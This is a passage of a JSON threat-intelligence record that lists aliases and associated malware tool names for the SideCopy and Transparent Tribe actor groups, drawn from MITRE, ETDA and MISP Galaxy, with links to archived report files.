"source_id": "ETDA", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434172, "ts_updated_at": 1775826717, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.pdf", "text": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.txt", "img": "https://archive.orkl.eu/1391f10eb893f4c3853f113bf29fe8ea7aba8e77.jpg" } }